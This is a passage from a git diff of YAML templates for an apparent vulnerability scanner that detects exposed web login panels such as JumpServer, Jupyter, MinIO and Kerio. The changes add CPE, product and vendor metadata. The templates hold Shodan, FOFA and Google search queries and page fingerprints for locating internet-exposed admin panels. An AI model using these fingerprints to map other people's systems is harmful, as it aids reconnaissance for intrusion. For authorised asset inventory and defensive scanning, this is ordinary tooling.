"http.title:\"JFrog\"" + product: artifactory + vendor: jfrog tags: panel,jfrog,edb,detect,login http: @@ -30,4 +33,4 @@ http: - 'status_code==200 && contains(body, "<title>JFrog")' - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" condition: or -# digest: 490a004630440220469671ce8c64f6c9c8fa36551da19ca159c2208d12f3484b7ad902b866ed5a4202201484f958ba1088c3c2e3a05a4d01d770d84d2533c52005170981bd0079a48b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220469671ce8c64f6c9c8fa36551da19ca159c2208d12f3484b7ad902b866ed5a4202201484f958ba1088c3c2e3a05a4d01d770d84d2533c52005170981bd0079a48b58:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/joget/joget-panel.yaml b/http/exposed-panels/joget/joget-panel.yaml index 6f2d02357a..fa9504d04f 100644 --- a/http/exposed-panels/joget/joget-panel.yaml +++ b/http/exposed-panels/joget/joget-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:joget:joget_dx:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-1343712810 + product: joget_dx + vendor: joget tags: panel,joget http: @@ -34,4 +37,4 @@ http: group: 2 regex: - '<li>(Version:[ \n\t]*([^<]+)[ \n\t]*)</li>' -# digest: 4b0a00483046022100f4ea81552318ec1427737a58229f2095a61bb2ceed46fe713439313c475cb4ba02210087abe19aca307a28013e2532fbc3b64f82456ef23a4ccf4c655bbad010a70952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4ea81552318ec1427737a58229f2095a61bb2ceed46fe713439313c475cb4ba02210087abe19aca307a28013e2532fbc3b64f82456ef23a4ccf4c655bbad010a70952:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jorani-panel.yaml b/http/exposed-panels/jorani-panel.yaml index 9a88e5e13a..0aca3d3dae 100644 --- a/http/exposed-panels/jorani-panel.yaml +++ b/http/exposed-panels/jorani-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jorani:jorani:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"Login - Jorani" + product: jorani + vendor: jorani tags: panel,jorani,login http: @@ -43,4 +46,4 @@ http: group: 1 regex: - ' v([0-9.]+)' -# digest: 4a0a00473045022100a1d82e78e6c9ce8e35c13cb9bb72cdeff0335e95efe1c29f07204fd1a19254f9022068238fe0159f27f4ed3a534c8e11e5a4a8db65dd2877ed162d21cca92defcef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1d82e78e6c9ce8e35c13cb9bb72cdeff0335e95efe1c29f07204fd1a19254f9022068238fe0159f27f4ed3a534c8e11e5a4a8db65dd2877ed162d21cca92defcef4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index 28d5db5a6b..392cffd23c 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1298131932 + product: jsherp + vendor: jishenghua tags: panel,jsherp,login,detect + classification: + cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jumpserver-panel.yaml b/http/exposed-panels/jumpserver-panel.yaml index 6cb5bbbefa..dad73c0b66 100644 --- a/http/exposed-panels/jumpserver-panel.yaml +++ b/http/exposed-panels/jumpserver-panel.yaml @@ -11,11 +11,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:'JumpServer' zoomeye-query: title:'JumpServer' + product: jumpserver + vendor: fit2cloud tags: panel,jumpserver http: @@ -28,19 +31,11 @@ http: - type: regex part: body regex: - - "(?i)<title>( - - .*)JumpServer Open Source Bastion Host( - - .*)" - - "(?i)( - - .*)JumpServer 开源堡垒机( - - .*)" + - "(?i)(\n.*)JumpServer Open Source Bastion Host(\n.*)" + - "(?i)(\n.*)JumpServer 开源堡垒机(\n.*)" condition: or - type: status status: - 200 -# digest: 4b0a00483046022100f4b0396a52c1610bb35f1dd1bc4c534710719eba4d96109ddbb2fce3a6592cf4022100f0f9a6390fd0a86d3503a0da739a9ff7986c2e45d44a0f9e84529409f7b44f78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4b0396a52c1610bb35f1dd1bc4c534710719eba4d96109ddbb2fce3a6592cf4022100f0f9a6390fd0a86d3503a0da739a9ff7986c2e45d44a0f9e84529409f7b44f78:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/jupyter-notebook.yaml b/http/exposed-panels/jupyter-notebook.yaml index 36910ba29a..20909fb72b 100644 --- a/http/exposed-panels/jupyter-notebook.yaml +++ b/http/exposed-panels/jupyter-notebook.yaml @@ -11,9 +11,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:* metadata: max-request: 4 shodan-query: http.html:"JupyterHub" + product: notebook + vendor: jupyter tags: edb,panel,jupyter,notebook,exposure http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f4228d1217daf22f95fe1c2d35fb94ffc284bb1544a73478158b09a7c949ed260220746ab20350d22ac0d5c88c2ba2cdf29bf7dab654dd0625913dd09d6c3f4762a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f4228d1217daf22f95fe1c2d35fb94ffc284bb1544a73478158b09a7c949ed260220746ab20350d22ac0d5c88c2ba2cdf29bf7dab654dd0625913dd09d6c3f4762a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/kerio-connect-client.yaml b/http/exposed-panels/kerio-connect-client.yaml index 4e1cf11beb..d905922d2c 100644 --- a/http/exposed-panels/kerio-connect-client.yaml +++ b/http/exposed-panels/kerio-connect-client.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:gfi:kerio_connect:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Kerio Connect Client" + product: kerio_connect + vendor: gfi tags: panel,kerio http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e91cccc8fe9dbcb42c4f78342df8f333704e30ba540f67bb3c3c2d50f72eb271022013ca0a147ac4f45de3f5f469c0c8b6e6e528b99bae16b64581308b67544b09e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e91cccc8fe9dbcb42c4f78342df8f333704e30ba540f67bb3c3c2d50f72eb271022013ca0a147ac4f45de3f5f469c0c8b6e6e528b99bae16b64581308b67544b09e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/kiali-panel.yaml b/http/exposed-panels/kiali-panel.yaml index eb8b38f24e..801399ec14 100644 --- a/http/exposed-panels/kiali-panel.yaml +++ b/http/exposed-panels/kiali-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: title:"Kiali" + product: kiali + vendor: kiali tags: panel,kiali,detect,login + classification: + cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: group: 1 regex: - '(?i)"Kiali version":\s*"([a-z0-9.]+)"' -# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/kkfileview-panel.yaml b/http/exposed-panels/kkfileview-panel.yaml index 404099c161..61b04dbc7f 100644 --- a/http/exposed-panels/kkfileview-panel.yaml +++ b/http/exposed-panels/kkfileview-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"kkFileView" + product: kkfileview + vendor: keking tags: panel,kkfileview http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c5ecbc0a7e18ab38e520a4a0498b4e886bb8cbe3c546b3f67cd37f1b1b0cb8c0220773956c25d2d18aa712b88038da9e77ad741a2ea23a6a1a4a5f187668943f99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c5ecbc0a7e18ab38e520a4a0498b4e886bb8cbe3c546b3f67cd37f1b1b0cb8c0220773956c25d2d18aa712b88038da9e77ad741a2ea23a6a1a4a5f187668943f99c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml index c5257024e5..84a5978c64 100644 --- a/http/exposed-panels/koel-panel.yaml +++ b/http/exposed-panels/koel-panel.yaml @@ -1,5 +1,5 @@ -id: koel-panel - +id: koel-panel + info: name: Koel Panel - Detect author: rxerium @@ -13,24 +13,28 @@ info: verified: true max-request: 1 shodan-query: title:"Koel" + product: koel + vendor: koel tags: panel,koel,login -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - 'Koel' - - 'Personal audio streaming service that works.' - condition: and - - - type: status - status: + classification: + cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'Koel' + - 'Personal audio streaming service that works.' + condition: and + + - type: status + status: - 200 -# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/kopano-webapp-panel.yaml b/http/exposed-panels/kopano-webapp-panel.yaml index 2e7b0807fa..e921310f0d 100644 --- a/http/exposed-panels/kopano-webapp-panel.yaml +++ b/http/exposed-panels/kopano-webapp-panel.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Kopano WebApp" + product: webapp + vendor: kopano tags: panel,kopano,login,detect + classification: + cpe: cpe:2.3:a:kopano:webapp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: group: 1 regex: - '\?kv([0-9.]+)"' -# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200559bf199955583fef50d4c9989c34ce5f3b9d7221b3eb6b2b2f87c65db2e28602204c7ea66ac0009f31daf9e1e9ef8d1bc04635b1e0d59403ab76261bd6d3c6f623:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index 580b3f6ed7..d8a31ba72c 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -8,11 +8,14 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:mirantis:kubernetes_engine:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" + product: kubernetes_engine + vendor: mirantis tags: tech,kubernetes,devops,kube,k8s,panel http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d11bc80653e4fdeacbd4246e19a49084e61587bdb4f3d4f8e51fc315226d00c5022100cc260dfbf4ef10bb8e0491ac97dd286a4cb22b078e3e874593e3e007f9a3edf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d11bc80653e4fdeacbd4246e19a49084e61587bdb4f3d4f8e51fc315226d00c5022100cc260dfbf4ef10bb8e0491ac97dd286a4cb22b078e3e874593e3e007f9a3edf2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/label-studio-panel.yaml b/http/exposed-panels/label-studio-panel.yaml index 6c0ea641c9..394fff0f40 100644 --- a/http/exposed-panels/label-studio-panel.yaml +++ b/http/exposed-panels/label-studio-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1649949475 + product: label_studio + vendor: heartex tags: label-studio,login,panel + classification: + cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:* http: - raw: - | @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da0538ebf234b3ca93efd0bf3045e2a8b6c49395e974ac845148157e7c3cd9ce02206fac9755a420d427132aab8074e5a88f112ac6a1388cf9c565946cd101acf5be:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/lancom-router-panel.yaml b/http/exposed-panels/lancom-router-panel.yaml index b11e3b8dac..637a404130 100644 --- a/http/exposed-panels/lancom-router-panel.yaml +++ b/http/exposed-panels/lancom-router-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:lancom-systems:wlc-4006:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"LANCOM Systems GmbH" + product: wlc-4006 + vendor: lancom-systems tags: panel,lancom,router http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022024b574b80a66b3f2eda292342f613ab32c9e0cb53439c7dfb973bd26ed7dc3b402206fd765e53d2eb606b877e655a08b9402bcd1f0ba5aa60c26fe608e29c107564a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022024b574b80a66b3f2eda292342f613ab32c9e0cb53439c7dfb973bd26ed7dc3b402206fd765e53d2eb606b877e655a08b9402bcd1f0ba5aa60c26fe608e29c107564a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ldap-account-manager-panel.yaml b/http/exposed-panels/ldap-account-manager-panel.yaml index d2a463bafb..ec3c0a8ef4 100644 --- a/http/exposed-panels/ldap-account-manager-panel.yaml +++ b/http/exposed-panels/ldap-account-manager-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"LDAP Account Manager" + product: ldap_account_manager + vendor: ldap-account-manager tags: panel,ldap http: @@ -35,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4f6549813480e0546479a9fd6750d989976aa4d0b4f2f8f36aac47b453a2b3502207b76576d03fef357d9c93a569493cab2bd7ea7ff23e2d1385cecf80cc36e7cd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4f6549813480e0546479a9fd6750d989976aa4d0b4f2f8f36aac47b453a2b3502207b76576d03fef357d9c93a569493cab2bd7ea7ff23e2d1385cecf80cc36e7cd5:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/leostream-panel.yaml b/http/exposed-panels/leostream-panel.yaml index d7a6c4835b..41702ae968 100644 --- a/http/exposed-panels/leostream-panel.yaml +++ b/http/exposed-panels/leostream-panel.yaml @@ -10,9 +10,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:leostream:connection_broker:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Leostream" + product: connection_broker + vendor: leostream tags: panel,leostream http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200e505817f3bd82c3d667852b1c69a41f2f4eafee8e21d670e34b91837288d921022014e7eaa78dbc8e205da177e543898ed6d0318701b8b69b6aea004505be8cb0d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e505817f3bd82c3d667852b1c69a41f2f4eafee8e21d670e34b91837288d921022014e7eaa78dbc8e205da177e543898ed6d0318701b8b69b6aea004505be8cb0d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/librephotos-panel.yaml b/http/exposed-panels/librephotos-panel.yaml index 376b380698..8b7ea8368b 100644 --- a/http/exposed-panels/librephotos-panel.yaml +++ b/http/exposed-panels/librephotos-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"LibrePhotos" + product: librephotos + vendor: librephotos_project tags: panel,librephotos,detect,login + classification: + cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: status: - 200 - 404 -# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mach-proweb-login.yaml b/http/exposed-panels/mach-proweb-login.yaml index 352dc60139..40940374ec 100644 --- a/http/exposed-panels/mach-proweb-login.yaml +++ b/http/exposed-panels/mach-proweb-login.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:reliablecontrols:mach-prowebcom:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 google-query: intitle:"Log on to MACH-ProWeb" + product: mach-prowebcom + vendor: reliablecontrols tags: panel,machproweb,edb http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100818e52f3897b7083be40706a79c03bd8fd06281d12e16ee989566c93a6dff5cd02210092a0731309a1b585bc7be773c0ac6364ce7bf068f38f21b57187314f9bc35140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100818e52f3897b7083be40706a79c03bd8fd06281d12e16ee989566c93a6dff5cd02210092a0731309a1b585bc7be773c0ac6364ce7bf068f38f21b57187314f9bc35140:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/machform-admin-panel.yaml b/http/exposed-panels/machform-admin-panel.yaml index 9977606d6d..9cfd46ae34 100644 --- a/http/exposed-panels/machform-admin-panel.yaml +++ b/http/exposed-panels/machform-admin-panel.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:machform:machform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"MachForm Admin Panel" + product: machform + vendor: machform tags: panel,machform,admin http: @@ -36,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203dc97a90fe54adc7590d0bc6834d24ad88d9c01b4f2db4a2cb6cf728f8d4343b0221008364c0fe8085bd19fc176e8ae220c002fd414dcc9d8abc1a04c3ead4f553a060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203dc97a90fe54adc7590d0bc6834d24ad88d9c01b4f2db4a2cb6cf728f8d4343b0221008364c0fe8085bd19fc176e8ae220c002fd414dcc9d8abc1a04c3ead4f553a060:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/magnolia-panel.yaml b/http/exposed-panels/magnolia-panel.yaml index c7428902b8..953df5eed3 100644 --- a/http/exposed-panels/magnolia-panel.yaml +++ b/http/exposed-panels/magnolia-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"Magnolia is a registered trademark" + product: magnolia_cms + vendor: magnolia-cms tags: magnolia,panel,login http: @@ -36,4 +39,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100ec31ab8a93a50b94d11914dbc02be50309f1fd505862e2189df17a21365fdf86022068582e478c88dc5d4d24118ee65c38eaf191a389e00feaca2cc9b693bf0152dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec31ab8a93a50b94d11914dbc02be50309f1fd505862e2189df17a21365fdf86022068582e478c88dc5d4d24118ee65c38eaf191a389e00feaca2cc9b693bf0152dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/minio-console.yaml b/http/exposed-panels/minio-console.yaml index 8e6e97d71b..f3397d3748 100644 --- a/http/exposed-panels/minio-console.yaml +++ b/http/exposed-panels/minio-console.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:minio:console:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"MinIO Console" fofa-query: app="MinIO-Console" + product: console + vendor: minio tags: panel,minio http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fea3343498683c4e6d86da45880751299a233a9dbe9b7d66259cacb71d27249a022100f55c808a66393b98cef83aaa093b0ed21cf85d6bbca14c3123b6d5361c2ab5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fea3343498683c4e6d86da45880751299a233a9dbe9b7d66259cacb71d27249a022100f55c808a66393b98cef83aaa093b0ed21cf85d6bbca14c3123b6d5361c2ab5df:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml index e622d7697e..2dac80fdf0 100644 --- a/http/exposed-panels/mitel-micollab-panel.yaml +++ b/http/exposed-panels/mitel-micollab-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"MiCollab End User Portal" + product: micollab + vendor: mitel tags: panel,mitel,login,detect + classification: + cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "micollab", "mitel_logo", "com.mitel.mas.portal.domain")' condition: and -# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mobile-management-panel.yaml b/http/exposed-panels/mobile-management-panel.yaml index 5c7e150ee0..56fbd1628b 100644 --- a/http/exposed-panels/mobile-management-panel.yaml +++ b/http/exposed-panels/mobile-management-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:zohocorp:manageengine_mobile_device_manager_plus:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: title="移动管理平台-企业管理" + product: manageengine_mobile_device_manager_plus + vendor: zohocorp tags: panel,mobile,management http: @@ -38,4 +41,4 @@ http: group: 1 regex: - 'version = "(.*)"' -# digest: 490a00463044022004cc8b0e9dae1d2e6d1ff6057da77199a3e2b81da07d3672837c7d6b8f3206cb02200671ee28de18040176200ebc50fba477860d1fc31582b4f293b7174e0408ff6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004cc8b0e9dae1d2e6d1ff6057da77199a3e2b81da07d3672837c7d6b8f3206cb02200671ee28de18040176200ebc50fba477860d1fc31582b4f293b7174e0408ff6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index 4733beb7ed..bd58c6943d 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:967636089 + product: sentry + vendor: mobileiron tags: panel,mobileiron + classification: + cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: group: 1 regex: - \?([\d.]+)" -# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mongodb-ops-manager.yaml b/http/exposed-panels/mongodb-ops-manager.yaml index fddc5be927..cef7e79ae6 100644 --- a/http/exposed-panels/mongodb-ops-manager.yaml +++ b/http/exposed-panels/mongodb-ops-manager.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:mongodb:ops_manager_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"MongoDB Ops Manager" + product: ops_manager_server + vendor: mongodb tags: panel,mongodb http: @@ -27,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b977344e6067f8d5fc6de4e2685d85d9ed86c35b6397c270b51d5ddda4536e4022025e2947b8d981fe221feb59cd3b7528ef68134aee7d542d77465c8d7dfabd87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b977344e6067f8d5fc6de4e2685d85d9ed86c35b6397c270b51d5ddda4536e4022025e2947b8d981fe221feb59cd3b7528ef68134aee7d542d77465c8d7dfabd87b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index dd58e35648..5b5c0359cc 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:-211006074 fofa-query: icon_hash="-211006074" + product: monitorr + vendor: monitorr tags: panel,monitorr,detect + classification: + cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:* http: - method: GET path: @@ -22,4 +26,4 @@ http: - 'status_code == 200' - 